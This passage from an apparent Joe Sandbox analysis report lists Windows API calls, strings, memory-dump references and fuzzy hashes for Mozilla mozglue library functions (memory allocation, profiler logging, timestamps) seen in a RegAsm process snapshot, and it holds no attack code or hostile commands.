                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F619
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C64F598), ref: 6C64F621
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F637
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8,?,?,00000000,?,6C64F598), ref: 6C64F645
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8,?,?,00000000,?,6C64F598), ref: 6C64F663
                                                                                                                                                        Strings
                                                                                                                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C64F62A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                        • API String ID: 2848912005-753366533
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C63CFAE,?,?,?,6C6031A7), ref: 6C6405FB
                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C63CFAE,?,?,?,6C6031A7), ref: 6C640616
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6031A7), ref: 6C64061C
                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6031A7), ref: 6C640627
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _writestrlen
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                        • API String ID: 2723441310-2186867486
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C6614C5
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6614E2
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C661546
                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C6615BA
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C6616B4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1909280232-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65DC60
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C65D38A,?), ref: 6C65DC6F
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,6C65D38A,?), ref: 6C65DCC1
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C65D38A,?), ref: 6C65DCE9
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C65D38A,?), ref: 6C65DD05
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C65D38A,?), ref: 6C65DD4A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1842996449-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C63F480
                                                                                                                                                          • Part of subcall function 6C60F100: LoadLibraryW.KERNEL32(shell32,?,6C67D020), ref: 6C60F122
                                                                                                                                                          • Part of subcall function 6C60F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C60F132
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6C63F555
                                                                                                                                                          • Part of subcall function 6C6114B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C611248,6C611248,?), ref: 6C6114C9
                                                                                                                                                          • Part of subcall function 6C6114B0: memcpy.VCRUNTIME140(?,6C611248,00000000,?,6C611248,?), ref: 6C6114EF
                                                                                                                                                          • Part of subcall function 6C60EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C60EEE3
                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C63F4FD
                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C63F523
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                        • String ID: \oleacc.dll
                                                                                                                                                        • API String ID: 2595878907-3839883404
                                                                                                                                                        APIs
                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6C667526
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C667566
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C667597
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                        • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                        • API String ID: 3217676052-1401603581
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C66C0E9), ref: 6C66C418
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C66C437
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C66C0E9), ref: 6C66C44C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                        • API String ID: 145871493-2623246514
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C66748B,?), ref: 6C6675B8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6675D7
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C66748B,?), ref: 6C6675EC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                        • API String ID: 145871493-3641475894
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C667592), ref: 6C667608
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C667627
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C667592), ref: 6C66763C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                        • API String ID: 145871493-1050664331
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,?,?,6C66BE49), ref: 6C66BEC4
                                                                                                                                                        • RtlCaptureStackBackTrace.NTDLL ref: 6C66BEDE
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C66BE49), ref: 6C66BF38
                                                                                                                                                        • RtlReAllocateHeap.NTDLL ref: 6C66BF83
                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C66BFA6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2764315370-0
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?,6C67D734), ref: 6C658E6E
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?,6C67D734), ref: 6C658EBF
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?), ref: 6C658F24
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?,6C67D734), ref: 6C658F46
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?), ref: 6C658F7A
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?), ref: 6C658F8F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                        APIs
                                                                                                                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C604E5A
                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C604E97
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C604EE9
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C604F02
                                                                                                                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C604F1E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000002,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C61159C
                                                                                                                                                        • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C6115BC
                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000001,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C6115E7
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C611606
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C611637
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66AD9D
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66ADAC
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66AE01
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66AE1D
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66AE3D
                                                                                                                                                        APIs
                                                                                                                                                        • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C67DCA0,?,?,?,6C63E8B5,00000000), ref: 6C665F1F
                                                                                                                                                        • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C63E8B5,00000000), ref: 6C665F4B
                                                                                                                                                        • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C63E8B5,00000000), ref: 6C665F7B
                                                                                                                                                        • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C63E8B5,00000000), ref: 6C665F9F
                                                                                                                                                        • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C63E8B5,00000000), ref: 6C665FD6
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C60B532
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C60B55B
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C60B56B
                                                                                                                                                        • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C60B57E
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C60B58F
                                                                                                                                                        APIs
                                                                                                                                                        • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C666E78
                                                                                                                                                          • Part of subcall function 6C666A10: InitializeCriticalSection.KERNEL32(6C68F618), ref: 6C666A68
                                                                                                                                                          • Part of subcall function 6C666A10: GetCurrentProcess.KERNEL32 ref: 6C666A7D
                                                                                                                                                          • Part of subcall function 6C666A10: GetCurrentProcess.KERNEL32 ref: 6C666AA1
                                                                                                                                                          • Part of subcall function 6C666A10: EnterCriticalSection.KERNEL32(6C68F618), ref: 6C666AAE
                                                                                                                                                          • Part of subcall function 6C666A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C666AE1
                                                                                                                                                          • Part of subcall function 6C666A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C666B15
                                                                                                                                                          • Part of subcall function 6C666A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C666B65
                                                                                                                                                          • Part of subcall function 6C666A10: LeaveCriticalSection.KERNEL32(6C68F618,?,?), ref: 6C666B83
                                                                                                                                                        • MozFormatCodeAddress.MOZGLUE ref: 6C666EC1
                                                                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C666EE1
                                                                                                                                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C666EED
                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C666EFF
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C603DEF), ref: 6C640D71
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C603DEF), ref: 6C640D84
                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C603DEF), ref: 6C640DAF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$Free$Alloc
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                        • API String ID: 1852963964-2186867486
                                                                                                                                                        • Opcode ID: 944008e0cdc31905b22db09adedadaf2fa2e36eaf5d12f577bf0dd8aa4c549a9
                                                                                                                                                        • Instruction ID: fa76a48f4d8e1f504d0a689103bbb85100d893a9ee786e18a95612010942af14
                                                                                                                                                        • Opcode Fuzzy Hash: 944008e0cdc31905b22db09adedadaf2fa2e36eaf5d12f577bf0dd8aa4c549a9
                                                                                                                                                        • Instruction Fuzzy Hash: 29F089713822A433E72415665C1AB6A379EABD3B65F35C035F224DA9C0DA90E40886BD
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6575C4,?), ref: 6C65762B
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6574D7,6C6615FC,?,?,?), ref: 6C657644
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65765A
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6574D7,6C6615FC,?,?,?), ref: 6C657663
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6574D7,6C6615FC,?,?,?), ref: 6C657677
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 418114769-0
                                                                                                                                                        • Opcode ID: d65ab9029d2dff16201d9816a51a7cba7fc987a8ede617b3f54229f8d6fb6f80
                                                                                                                                                        • Instruction ID: 0a45fcd0a4dab4d8a0fa478946c7a1765c6f698398b9c3082a0cac7032a1f63d
                                                                                                                                                        • Opcode Fuzzy Hash: d65ab9029d2dff16201d9816a51a7cba7fc987a8ede617b3f54229f8d6fb6f80
                                                                                                                                                        • Instruction Fuzzy Hash: F4F08C71E10745ABD7008F22C888A6AB778FFEB299F115316F90552612E7B0A5D18BE4
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D4F2
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D50B
                                                                                                                                                          • Part of subcall function 6C60CFE0: EnterCriticalSection.KERNEL32(6C68E784), ref: 6C60CFF6
                                                                                                                                                          • Part of subcall function 6C60CFE0: LeaveCriticalSection.KERNEL32(6C68E784), ref: 6C60D026
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D52E
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E7DC), ref: 6C62D690
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D751
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                        • String ID: MOZ_CRASH()
                                                                                                                                                        • API String ID: 3805649505-2608361144
                                                                                                                                                        • Opcode ID: be606b0672a3145f1e6ec215d767e9b27b67036acfce3df59a088aa273ab52bb
                                                                                                                                                        • Instruction ID: ae9cdd0ea885fec23e8f180e614072c5c27c1c32df0fd57160aeac4020ffda2c
                                                                                                                                                        • Opcode Fuzzy Hash: be606b0672a3145f1e6ec215d767e9b27b67036acfce3df59a088aa273ab52bb
